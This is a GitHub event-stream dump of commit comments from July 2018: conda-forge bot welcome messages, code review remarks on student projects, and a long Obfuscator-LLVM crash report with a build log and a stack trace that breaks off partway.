{"id":"7905760683","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/oommfodt-feedstock"},"payload":{"comment":{"id":29564120,"position":null,"line":null,"path":null,"commit_id":"3d2e40d2b7e96919b1c41932f7cf68bab30c247c","created_at":"2018-07-02T10:16:54Z","updated_at":"2018-07-02T10:16:54Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T10:16:54Z"}
{"id":"7905763055","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/joommfutil-feedstock"},"payload":{"comment":{"id":29564125,"position":null,"line":null,"path":null,"commit_id":"91ccd6d3ab2c2f1210f7ffce76d22d4962927eea","created_at":"2018-07-02T10:17:24Z","updated_at":"2018-07-02T10:17:24Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T10:17:24Z"}
{"id":"7905764801","type":"CommitCommentEvent","actor":{"login":"1523018"},"repo":{"name":"1523018/chapter5-janken-uetsh"},"payload":{"comment":{"id":29564128,"position":null,"line":null,"path":null,"commit_id":"e7cb6f344704b32bee636c3b47ec9804489e1774","created_at":"2018-07-02T10:17:44Z","updated_at":"2018-07-02T10:17:44Z","author_association":"OWNER","body":"Rに関してエラーが消えませんが他は問題ないと思います。"}},"created_at":"2018-07-02T10:17:44Z"}
{"id":"7905769717","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/discretisedfield-feedstock"},"payload":{"comment":{"id":29564138,"position":null,"line":null,"path":null,"commit_id":"0587995b2bb716805ce490bdf7118e9d29c8c681","created_at":"2018-07-02T10:18:44Z","updated_at":"2018-07-02T10:18:44Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T10:18:44Z"}
{"id":"7905771656","type":"CommitCommentEvent","actor":{"login":"why198852"},"repo":{"name":"apache/kylin"},"payload":{"comment":{"id":29564148,"position":null,"line":null,"path":null,"commit_id":"f6b1dfb5ef3239ea252b1498bf4c51235361bbcd","created_at":"2018-07-02T10:19:06Z","updated_at":"2018-07-02T10:19:06Z","author_association":"NONE","body":"hello,Apache Kylin Cube is built with Spark as the engine. The Cube that is finished in about 30 minutes at ordinary times is frequently stuck in 54.55% recently. There are no errors.\r\n![image](https://user-images.githubusercontent.com/7369529/42158877-64c27aae-7e24-11e8-9d0a-a7c8a3057957.png)\r\n"}},"created_at":"2018-07-02T10:19:06Z"}
{"id":"7905773970","type":"CommitCommentEvent","actor":{"login":"clayton-snyder"},"repo":{"name":"clayton-snyder/OS"},"payload":{"comment":{"id":29564160,"position":null,"line":null,"path":null,"commit_id":"1cc471b7f08232fd969e412aa49a2a9099f1176f","created_at":"2018-07-02T10:19:32Z","updated_at":"2018-07-02T10:19:32Z","author_association":"OWNER","body":"Still need to do the delimiters (; -> join() and & -> nah)."}},"created_at":"2018-07-02T10:19:32Z"}
{"id":"7905776449","type":"CommitCommentEvent","actor":{"login":"olepor"},"repo":{"name":"mendersoftware/gui"},"payload":{"comment":{"id":29564169,"position":null,"line":null,"path":null,"commit_id":"c69b2ffde29709c14cf28caa649272357ea70094","created_at":"2018-07-02T10:20:04Z","updated_at":"2018-07-02T10:20:04Z","author_association":"NONE","body":"Seems u are right on both counts @michaelatmender. Thank you! "}},"created_at":"2018-07-02T10:20:04Z"}
{"id":"7905776460","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29564170,"position":24,"line":25,"path":"week-07/day-4/FoxClub/FoxClub/Controllers/FoxController.cs","commit_id":"136621470c8ccd05968ddebbe45658d5d98f274c","created_at":"2018-07-02T10:20:04Z","updated_at":"2018-07-02T10:20:04Z","author_association":"NONE","body":"It is a bit dangerous to pass something to the View, what's type is a string. In many cases, it can be misleading and malfunctioning because the controller will look up and try to load them cshtml in your folder, but you can use the method name as a fixpoint. If your cshtml is in the right folder and named as the method it will be straightforward and should cause no ambiguity or inconsistency."}},"created_at":"2018-07-02T10:20:04Z"}
{"id":"7905781644","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29564176,"position":10,"line":10,"path":"week-07/day-4/FoxClub/FoxClub/Models/NutritionStoreModel.cs","commit_id":"50b4633cb34f933c0bdb9c521f2530a873e7f3c9","created_at":"2018-07-02T10:21:08Z","updated_at":"2018-07-02T10:21:08Z","author_association":"NONE","body":"Nice way to create Models when you put properties, it will provide you fields, getters, and getters the same time 👍 \r\n"}},"created_at":"2018-07-02T10:21:08Z"}
{"id":"7905782113","type":"CommitCommentEvent","actor":{"login":"Tarek1337"},"repo":{"name":"sfirfi/Bug-Bomber-600"},"payload":{"comment":{"id":29564178,"position":null,"line":null,"path":null,"commit_id":"62723d03a3f29ff748fc0f17df0a5da9afecbd9b","created_at":"2018-07-02T10:21:14Z","updated_at":"2018-07-02T10:21:14Z","author_association":"COLLABORATOR","body":"This was by accident, it'll be fixed in a few minutes"}},"created_at":"2018-07-02T10:21:14Z"}
{"id":"7905783135","type":"CommitCommentEvent","actor":{"login":"tarzan115"},"repo":{"name":"esp8266/Arduino"},"payload":{"comment":{"id":29564180,"position":25,"line":150,"path":"cores/esp8266/core_esp8266_wiring_digital.c","commit_id":"641c5cdc61e5967c682a24e2df1c3b1765d60dab","created_at":"2018-07-02T10:21:27Z","updated_at":"2018-07-02T10:21:27Z","author_association":"CONTRIBUTOR","body":"Me too. It's working now"}},"created_at":"2018-07-02T10:21:27Z"}
{"id":"7905784454","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"subinyoon/RB_homepage_coding"},"payload":{"comment":{"id":29564183,"position":55,"line":137,"path":"js/main.js","commit_id":"a01bd0df4e8cd4596086b615b1670a02d5a8e66c","created_at":"2018-07-02T10:21:43Z","updated_at":"2018-07-02T10:21:43Z","author_association":"NONE","body":"```javascript\r\nvar index = 1;\r\nfor( ;index<10;index++) {\r\n     b$(\".theme_1_\"+index).css({'display':'none'});\r\n}\r\n```"}},"created_at":"2018-07-02T10:21:43Z"}
{"id":"7905789615","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"subinyoon/RB_homepage_coding"},"payload":{"comment":{"id":29564194,"position":22,"line":24,"path":"rb_index.html","commit_id":"69c29b72037dba6a3af281213b10e706aa0e8863","created_at":"2018-07-02T10:22:46Z","updated_at":"2018-07-02T10:22:46Z","author_association":"NONE","body":"주석은\r\n<!-- -->\r\n말고\r\n<%-- --%> \r\n을 사용하면 브라우저의 개발자도구에서 해당 주석을 확인할 수 없음"}},"created_at":"2018-07-02T10:22:46Z"}
{"id":"7905791782","type":"CommitCommentEvent","actor":{"login":"spelle"},"repo":{"name":"spelle/obfuscator"},"payload":{"comment":{"id":29564199,"position":null,"line":null,"path":null,"commit_id":"571624df82aaa4a3a3571e30db2dd231047c6e32","created_at":"2018-07-02T10:23:13Z","updated_at":"2018-07-02T10:23:13Z","author_association":"OWNER","body":"Hi,\r\n\r\nOk. I installed ubuntu's QT packages. I have had a crash.\r\nI recompiled the whole o-llvm with assertions enabled :\r\n```\r\ncmake -G \"Unix Makefiles\" -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_ASSERTIONS=ON -DLLDB_CODESIGN_IDENTITY='' ../obfuscator.llvm-6.0.0.src\r\n```\r\nThen I could enable debug messages from the string obfuscation pass with `-mllvm -debug-only=sobf`.\r\n\r\nAnd at last I had this crash : \r\n```\r\n12:16:04: Running steps for project singlefile...\r\n12:16:04: Configuration unchanged, skipping qmake step.\r\n12:16:04: Starting: \"/usr/bin/make\" \r\n/usr/lib/qt5/bin/qmake -o Makefile ../singlefile/singlefile.pro -spec linux-clang CONFIG+=debug CONFIG+=qml_debug\r\nProject MESSAGE: C++ obfuscation enabled!\r\nProject WARNING: CONFIG-=import_qpa_plugin is deprecated. Use QTPLUGIN.platforms=- instead.\r\nclang++ -c -pipe -mllvm -sub -mllvm -sub_loop=3 -mllvm -fla -mllvm -spli -mllvm -split_num=2 -mllvm -bcf -mllvm -bcf_loop=2 -mllvm -sobf -mllvm -debug-only=sobf -O2 -D_REENTRANT -fPIC -DQT_CORE_LIB -I../singlefile -I. -isystem /usr/include/x86_64-linux-gnu/qt5 -isystem /usr/include/x86_64-linux-gnu/qt5/QtCore -I. -I/usr/lib/x86_64-linux-gnu/qt5/mkspecs/linux-clang -o main.o ../singlefile/main.cpp\r\nGlobal var .strStringObfuscationPass: Global variable found : .str\r\n is constantGlobal var __PRETTY_FUNCTION__._Z4textvStringObfuscationPass: Global variable found : __PRETTY_FUNCTION__._Z4textv\r\n is constantGlobal var .str.1StringObfuscationPass: Global variable found : .str.1\r\n is constantGlobal var __PRETTY_FUNCTION__.mainStringObfuscationPass: Global variable found : __PRETTY_FUNCTION__.main\r\n is constantGlobal var .str.2StringObfuscationPass: Global variable found : .str.2\r\n is constantGlobal var .str.3StringObfuscationPass: Global variable found : .str.3\r\n is constantGlobal var xStringObfuscationPass: Global variable found : x\r\nGlobal var yStringObfuscationPass: Global variable found : y\r\nGlobal var x.4StringObfuscationPass: Global variable found : x.4\r\nGlobal var y.5StringObfuscationPass: Global variable found : y.5\r\nGlobal var x.6StringObfuscationPass: Global variable found : x.6\r\nGlobal var y.7StringObfuscationPass: Global variable found : y.7\r\nGlobal var x.8StringObfuscationPass: Global variable found : x.8\r\nGlobal var y.9StringObfuscationPass: Global variable found : y.9\r\nGlobal var x.10StringObfuscationPass: Global variable found : x.10\r\nGlobal var y.11StringObfuscationPass: Global variable found : y.11\r\nGlobal var x.12StringObfuscationPass: Global variable found : x.12\r\nGlobal var y.13StringObfuscationPass: Global variable found : y.13\r\nGlobal var x.14StringObfuscationPass: Global variable found : x.14\r\nGlobal var y.15StringObfuscationPass: Global variable found : y.15\r\nGlobal var x.16StringObfuscationPass: Global variable found : x.16\r\nGlobal var y.17StringObfuscationPass: Global variable found : y.17\r\nGlobal var x.18StringObfuscationPass: Global variable found : x.18\r\nGlobal var y.19StringObfuscationPass: Global variable found : y.19\r\nGlobal var x.20StringObfuscationPass: Global variable found : x.20\r\nGlobal var y.21StringObfuscationPass: Global variable found : y.21\r\nGlobal var x.22StringObfuscationPass: Global variable found : x.22\r\nGlobal var y.23StringObfuscationPass: Global variable found : y.23\r\nGlobal var x.24StringObfuscationPass: Global variable found : x.24\r\nGlobal var y.25StringObfuscationPass: Global variable found : y.25\r\nGlobal var x.26StringObfuscationPass: Global variable found : x.26\r\nGlobal var y.27StringObfuscationPass: Global variable found : y.27\r\nGlobal var x.28StringObfuscationPass: Global variable found : x.28\r\nGlobal var y.29StringObfuscationPass: Global variable found : y.29\r\nGlobal var x.30StringObfuscationPass: Global variable found : x.30\r\nGlobal var y.31StringObfuscationPass: Global variable found : y.31\r\nGlobal var x.32StringObfuscationPass: Global variable found : x.32\r\nGlobal var y.33StringObfuscationPass: Global variable found : y.33\r\nGlobal var x.34StringObfuscationPass: Global variable found : x.34\r\nGlobal var y.35StringObfuscationPass: Global variable found : y.35\r\nGlobal var x.36StringObfuscationPass: Global variable found : x.36\r\nGlobal var y.37StringObfuscationPass: Global variable found : y.37\r\nGlobal var x.38StringObfuscationPass: Global variable found : x.38\r\nGlobal var y.39StringObfuscationPass: Global variable found : y.39\r\nGlobal var x.40StringObfuscationPass: Global variable found : x.40\r\nGlobal var y.41StringObfuscationPass: Global variable found : y.41\r\nGlobal var x.42StringObfuscationPass: Global variable found : x.42\r\nGlobal var y.43StringObfuscationPass: Global variable found : y.43\r\nGlobal var x.44StringObfuscationPass: Global variable found : x.44\r\nGlobal var y.45StringObfuscationPass: Global variable found : y.45\r\nGlobal var x.46StringObfuscationPass: Global variable found : x.46\r\nGlobal var y.47StringObfuscationPass: Global variable found : y.47\r\nGlobal var x.48StringObfuscationPass: Global variable found : x.48\r\nGlobal var y.49StringObfuscationPass: Global variable found : y.49\r\nGlobal var x.50StringObfuscationPass: Global variable found : x.50\r\nGlobal var y.51StringObfuscationPass: Global variable found : y.51\r\nGlobal var x.52StringObfuscationPass: Global variable found : x.52\r\nGlobal var y.53StringObfuscationPass: Global variable found : y.53\r\nGlobal var x.54StringObfuscationPass: Global variable found : x.54\r\nGlobal var y.55StringObfuscationPass: Global variable found : y.55\r\nGlobal var x.56StringObfuscationPass: Global variable found : x.56\r\nGlobal var y.57StringObfuscationPass: Global variable found : y.57\r\nGlobal var x.58StringObfuscationPass: Global variable found : x.58\r\nGlobal var y.59StringObfuscationPass: Global variable found : y.59\r\nGlobal var x.60StringObfuscationPass: Global variable found : x.60\r\nGlobal var y.61StringObfuscationPass: Global variable found : y.61\r\nGlobal var x.62StringObfuscationPass: Global variable found : x.62\r\nGlobal var y.63StringObfuscationPass: Global variable found : y.63\r\nGlobal var x.64StringObfuscationPass: Global variable found : x.64\r\nGlobal var y.65StringObfuscationPass: Global variable found : y.65\r\nGlobal var x.66StringObfuscationPass: Global variable found : x.66\r\nGlobal var y.67StringObfuscationPass: Global variable found : y.67\r\nGlobal var x.68StringObfuscationPass: Global variable found : x.68\r\nGlobal var y.69StringObfuscationPass: Global variable found : y.69\r\nGlobal var x.70StringObfuscationPass: Global variable found : x.70\r\nGlobal var y.71StringObfuscationPass: Global variable found : y.71\r\nGlobal var x.72StringObfuscationPass: Global variable found : x.72\r\nGlobal var y.73StringObfuscationPass: Global variable found : y.73\r\nGlobal var .str.74StringObfuscationPass: Global variable found : .str.74\r\nGlobal var __PRETTY_FUNCTION__._Z4textv.75StringObfuscationPass: Global variable found : __PRETTY_FUNCTION__._Z4textv.75\r\nGlobal var .str.1.76StringObfuscationPass: Global variable found : .str.1.76\r\nGlobal var __PRETTY_FUNCTION__.main.77StringObfuscationPass: Global variable found : __PRETTY_FUNCTION__.main.77\r\nGlobal var .str.2.78StringObfuscationPass: Global variable found : .str.2.78\r\nGlobal var .str.3.79StringObfuscationPass: Global variable found : .str.3.79\r\nFunction name is .datadiv_decode2267055700760734089\r\nAdding code for .str.74\r\nAdding code for __PRETTY_FUNCTION__._Z4textv.75\r\nAdding code for .str.1.76\r\nAdding code for __PRETTY_FUNCTION__.main.77\r\nAdding code for .str.2.78\r\nAdding code for .str.3.79\r\nclang++ -c -pipe -mllvm -sub -mllvm -sub_loop=3 -mllvm -fla -mllvm -spli -mllvm -split_num=2 -mllvm -bcf -mllvm -bcf_loop=2 -mllvm -sobf -mllvm -debug-only=sobf -O2 -D_REENTRANT -fPIC -DQT_CORE_LIB -I../singlefile -I. -isystem /usr/include/x86_64-linux-gnu/qt5 -isystem /usr/include/x86_64-linux-gnu/qt5/QtCore -I. -I/usr/lib/x86_64-linux-gnu/qt5/mkspecs/linux-clang -o testclass.o ../singlefile/testclass.cpp\r\nGlobal var _ZTV9TestClassStringObfuscationPass: Global variable found : _ZTV9TestClass\r\nGlobal var xStringObfuscationPass: Global variable found : x\r\nGlobal var yStringObfuscationPass: Global variable found : y\r\nFunction name is .datadiv_decode16797152721605294485\r\n/usr/lib/qt5/bin/moc -DQT_CORE_LIB -D__cplusplus=201402L -D__GNUC__=7 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -I/usr/lib/x86_64-linux-gnu/qt5/mkspecs/linux-clang -I/home/msc/Workspaces/o-llvm-workspace/singlefile -I/usr/include/x86_64-linux-gnu/qt5 -I/usr/include/x86_64-linux-gnu/qt5/QtCore -I. -I/usr/include/c++/7 -I/usr/include/x86_64-linux-gnu/c++/7 -I/usr/include/c++/7/backward -I/usr/lib/gcc/x86_64-linux-gnu/7/include -I/usr/local/include -I/usr/lib/gcc/x86_64-linux-gnu/7/include-fixed -I/usr/include/x86_64-linux-gnu -I/usr/include ../singlefile/testclass.h -o moc_testclass.cpp\r\nclang++ -c -pipe -mllvm -sub -mllvm -sub_loop=3 -mllvm -fla -mllvm -spli -mllvm -split_num=2 -mllvm -bcf -mllvm -bcf_loop=2 -mllvm -sobf -mllvm -debug-only=sobf -O2 -D_REENTRANT -fPIC -DQT_CORE_LIB -I../singlefile -I. -isystem /usr/include/x86_64-linux-gnu/qt5 -isystem /usr/include/x86_64-linux-gnu/qt5/QtCore -I. -I/usr/lib/x86_64-linux-gnu/qt5/mkspecs/linux-clang -o moc_testclass.o moc_testclass.cpp\r\nGlobal var _ZN7QObject16staticMetaObjectEStringObfuscationPass: Global variable found : _ZN7QObject16staticMetaObjectE\r\nGlobal var _ZL22qt_meta_data_TestClassStringObfuscationPass: Global variable found : _ZL22qt_meta_data_TestClass\r\n is constantGlobal var _ZN9TestClass16staticMetaObjectEStringObfuscationPass: Global variable found : _ZN9TestClass16staticMetaObjectE\r\nGlobal var _ZTV9TestClassStringObfuscationPass: Global variable found : _ZTV9TestClass\r\nGlobal var _ZTVN10__cxxabiv120__si_class_type_infoEStringObfuscationPass: Global variable found : _ZTVN10__cxxabiv120__si_class_type_infoE\r\nGlobal var _ZTS9TestClassStringObfuscationPass: Global variable found : _ZTS9TestClass\r\n is constantGlobal var _ZTI7QObjectStringObfuscationPass: Global variable found : _ZTI7QObject\r\nGlobal var _ZTI9TestClassStringObfuscationPass: Global variable found : _ZTI9TestClass\r\nGlobal var .strStringObfuscationPass: Global variable found : .str\r\n is constantGlobal var __PRETTY_FUNCTION__._ZNK9TestClass4textEvStringObfuscationPass: Global variable found : __PRETTY_FUNCTION__._ZNK9TestClass4textEv\r\n is constantGlobal var .str.1StringObfuscationPass: Global variable found : .str.1\r\n is constantGlobal var .str.2StringObfuscationPass: Global variable found : .str.2\r\n is constantGlobal var .str.3StringObfuscationPass: Global variable found : .str.3\r\n is constantGlobal var .str.4StringObfuscationPass: Global variable found : .str.4\r\n is constantGlobal var _ZL28qt_meta_stringdata_TestClassStringObfuscationPass: Global variable found : _ZL28qt_meta_stringdata_TestClass\r\nGlobal var xStringObfuscationPass: Global variable found : x\r\nGlobal var yStringObfuscationPass: Global variable found : y\r\nGlobal var x.6StringObfuscationPass: Global variable found : x.6\r\nGlobal var y.7StringObfuscationPass: Global variable found : y.7\r\nGlobal var x.8StringObfuscationPass: Global variable found : x.8\r\nGlobal var y.9StringObfuscationPass: Global variable found : y.9\r\nGlobal var x.10StringObfuscationPass: Global variable found : x.10\r\nGlobal var y.11StringObfuscationPass: Global variable found : y.11\r\nGlobal var x.12StringObfuscationPass: Global variable found : x.12\r\nGlobal var y.13StringObfuscationPass: Global variable found : y.13\r\nGlobal var x.14StringObfuscationPass: Global variable found : x.14\r\nGlobal var y.15StringObfuscationPass: Global variable found : y.15\r\nGlobal var x.16StringObfuscationPass: Global variable found : x.16\r\nGlobal var y.17StringObfuscationPass: Global variable found : y.17\r\nGlobal var x.18StringObfuscationPass: Global variable found : x.18\r\nGlobal var y.19StringObfuscationPass: Global variable found : y.19\r\nGlobal var x.20StringObfuscationPass: Global variable found : x.20\r\nGlobal var y.21StringObfuscationPass: Global variable found : y.21\r\nGlobal var x.22StringObfuscationPass: Global variable found : x.22\r\nGlobal var y.23StringObfuscationPass: Global variable found : y.23\r\nGlobal var x.24StringObfuscationPass: Global variable found : x.24\r\nGlobal var y.25StringObfuscationPass: Global variable found : y.25\r\nGlobal var x.26StringObfuscationPass: Global variable found : x.26\r\nGlobal var y.27StringObfuscationPass: Global variable found : y.27\r\nGlobal var x.28StringObfuscationPass: Global variable found : x.28\r\nGlobal var y.29StringObfuscationPass: Global variable found : y.29\r\nGlobal var x.30StringObfuscationPass: Global variable found : x.30\r\nGlobal var y.31StringObfuscationPass: Global variable found : y.31\r\nGlobal var x.32StringObfuscationPass: Global variable found : x.32\r\nGlobal var y.33StringObfuscationPass: Global variable found : y.33\r\nGlobal var x.34StringObfuscationPass: Global variable found : x.34\r\nGlobal var y.35StringObfuscationPass: Global variable found : y.35\r\nGlobal var x.36StringObfuscationPass: Global variable found : x.36\r\nGlobal var y.37StringObfuscationPass: Global variable found : y.37\r\nGlobal var x.38StringObfuscationPass: Global variable found : x.38\r\nGlobal var y.39StringObfuscationPass: Global variable found : y.39\r\nGlobal var x.40StringObfuscationPass: Global variable found : x.40\r\nGlobal var y.41StringObfuscationPass: Global variable found : y.41\r\nGlobal var x.42StringObfuscationPass: Global variable found : x.42\r\nGlobal var y.43StringObfuscationPass: Global variable found : y.43\r\nGlobal var x.44StringObfuscationPass: Global variable found : x.44\r\nGlobal var y.45StringObfuscationPass: Global variable found : y.45\r\nGlobal var x.46StringObfuscationPass: Global variable found : x.46\r\nGlobal var y.47StringObfuscationPass: Global variable found : y.47\r\nGlobal var x.48StringObfuscationPass: Global variable found : x.48\r\nGlobal var y.49StringObfuscationPass: Global variable found : y.49\r\nGlobal var x.50StringObfuscationPass: Global variable found : x.50\r\nGlobal var y.51StringObfuscationPass: Global variable found : y.51\r\nGlobal var x.52StringObfuscationPass: Global variable found : x.52\r\nGlobal var y.53StringObfuscationPass: Global variable found : y.53\r\nGlobal var x.54StringObfuscationPass: Global variable found : x.54\r\nGlobal var y.55StringObfuscationPass: Global variable found : y.55\r\nGlobal var x.56StringObfuscationPass: Global variable found : x.56\r\nGlobal var y.57StringObfuscationPass: Global variable found : y.57\r\nGlobal var _ZL22qt_meta_data_TestClass.58StringObfuscationPass: Global variable found : _ZL22qt_meta_data_TestClass.58\r\nGlobal var _ZTS9TestClass.59StringObfuscationPass: Global variable found : _ZTS9TestClass.59\r\nGlobal var .str.60StringObfuscationPass: Global variable found : .str.60\r\nGlobal var __PRETTY_FUNCTION__._ZNK9TestClass4textEv.61StringObfuscationPass: Global variable found : __PRETTY_FUNCTION__._ZNK9TestClass4textEv.61\r\nGlobal var .str.1.62StringObfuscationPass: Global variable found : .str.1.62\r\nGlobal var .str.2.63StringObfuscationPass: Global variable found : .str.2.63\r\nGlobal var .str.3.64StringObfuscationPass: Global variable found : .str.3.64\r\nGlobal var .str.4.65StringObfuscationPass: Global variable found : .str.4.65\r\nFunction name is .datadiv_decode1363081302472564553\r\nAdding code for _ZL22qt_meta_data_TestClass.58\r\nclang-6.0: /opt/obfuscator.llvm-6.0.0.src/lib/IR/Instructions.cpp:2087: static llvm::BinaryOperator* llvm::BinaryOperator::Create(llvm::Instruction::BinaryOps, llvm::Value*, llvm::Value*, const llvm::Twine&, llvm::Instruction*): Assertion `S1->getType() == S2->getType() && \"Cannot create binary operator with two operands of differing type!\"' failed.\r\n#0 0x000055a19ddf287a llvm::sys::PrintStackTrace(llvm::raw_ostream&) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x254d87a)\r\n#1 0x000055a19ddf04a6 llvm::sys::RunSignalHandlers() (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x254b4a6)\r\n#2 0x000055a19ddf0845 SignalHandler(int) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x254b845)\r\n#3 0x00007f5882085890 __restore_rt (/lib/x86_64-linux-gnu/libpthread.so.0+0x12890)\r\n#4 0x00007f5880d31e97 gsignal /build/glibc-OTsEL5/glibc-2.27/signal/../sysdeps/unix/sysv/linux/raise.c:51:0\r\n#5 0x00007f5880d33801 abort /build/glibc-OTsEL5/glibc-2.27/stdlib/abort.c:81:0\r\n#6 0x00007f5880d2339a __assert_fail_base /build/glibc-OTsEL5/glibc-2.27/assert/assert.c:89:0\r\n#7 0x00007f5880d23412 (/lib/x86_64-linux-gnu/libc.so.6+0x30412)\r\n#8 0x000055a19d8910ac (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x1fec0ac)\r\n#9 0x000055a19d8910c3 llvm::BinaryOperator::Create(llvm::Instruction::BinaryOps, llvm::Value*, llvm::Value*, llvm::Twine const&, llvm::BasicBlock*) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x1fec0c3)\r\n#10 0x000055a19f9e1e0b llvm::StringObfuscationPass::addDecodeFunction(llvm::Module*, std::vector<llvm::encVar*, std::allocator<llvm::encVar*> >*) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x413ce0b)\r\n#11 0x000055a19f9e2c45 llvm::StringObfuscationPass::runOnModule(llvm::Module&) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x413dc45)\r\n#12 0x000055a19d8b77a1 llvm::legacy::PassManagerImpl::run(llvm::Module&) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x20127a1)\r\n#13 0x000055a19dfcc396 (anonymous namespace)::EmitAssemblyHelper::EmitAssembly(clang::BackendAction, std::unique_ptr<llvm::raw_pwrite_stream, std::default_delete<llvm::raw_pwrite_stream> >) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x2727396)\r\n#14 0x000055a19dfcdf45 clang::EmitBackendOutput(clang::DiagnosticsEngine&, clang::HeaderSearchOptions const&, clang::CodeGenOptions const&, clang::TargetOptions const&, clang::LangOptions const&, llvm::DataLayout const&, llvm::Module*, clang::BackendAction, std::unique_ptr<llvm::raw_pwrite_stream, std::default_delete<llvm::raw_pwrite_stream> >) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x2728f45)\r\n#15 0x000055a19e87edf8 clang::BackendConsumer::HandleTranslationUnit(clang::ASTContext&) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x2fd9df8)\r\n#16 0x000055a19ea76e8a clang::ParseAST(clang::Sema&, bool, bool) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x31d1e8a)\r\n#17 0x000055a19e87dae8 clang::CodeGenAction::ExecuteAction() (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x2fd8ae8)\r\n#18 0x000055a19e3c2b56 clang::FrontendAction::Execute() (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x2b1db56)\r\n#19 0x000055a19e38a7de clang::CompilerInstance::ExecuteAction(clang::FrontendAction&) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x2ae57de)\r\n#20 0x000055a19e46012a clang::ExecuteCompilerInvocation(clang::CompilerInstance*) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0x2bbb12a)\r\n#21 0x000055a19c5e57a8 cc1_main(llvm::ArrayRef<char const*>, char const*, void*) (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0xd407a8)\r\n#22 0x000055a19c55f398 main (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0xcba398)\r\n#23 0x00007f5880d14b97 __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:344:0\r\n#24 0x000055a19c5e173a _start (/opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0+0xd3c73a)\r\nStack dump:\r\n0.\tProgram arguments: /opt/obfuscator.llvm-6.0.0.build/bin/clang-6.0 -cc1 -triple x86_64-unknown-linux-gnu -emit-obj -disable-free -main-file-name moc_testclass.cpp -mrelocation-model pic -pic-level 2 -mthread-model posix -fmath-errno -masm-verbose -mconstructor-aliases -munwind-tables -fuse-init-array -target-cpu x86-64 -dwarf-column-info -debugger-tuning=gdb -momit-leaf-frame-pointer -coverage-notes-file /home/msc/Workspaces/o-llvm-workspace/build-singlefile-Desktop-Debug/moc_testclass.gcno -resource-dir /opt/obfuscator.llvm-6.0.0.build/lib/clang/6.0.0 -isystem /usr/include/x86_64-linux-gnu/qt5 -isystem /usr/include/x86_64-linux-gnu/qt5/QtCore -D _REENTRANT -D QT_CORE_LIB -I ../singlefile -I . -I . -I /usr/lib/x86_64-linux-gnu/qt5/mkspecs/linux-clang -internal-isystem /usr/lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0 -internal-isystem /usr/lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/x86_64-linux-gnu/c++/7.3.0 -internal-isystem /usr/lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/x86_64-linux-gnu/c++/7.3.0 -internal-isystem /usr/lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/backward -internal-isystem /usr/local/include -internal-isystem 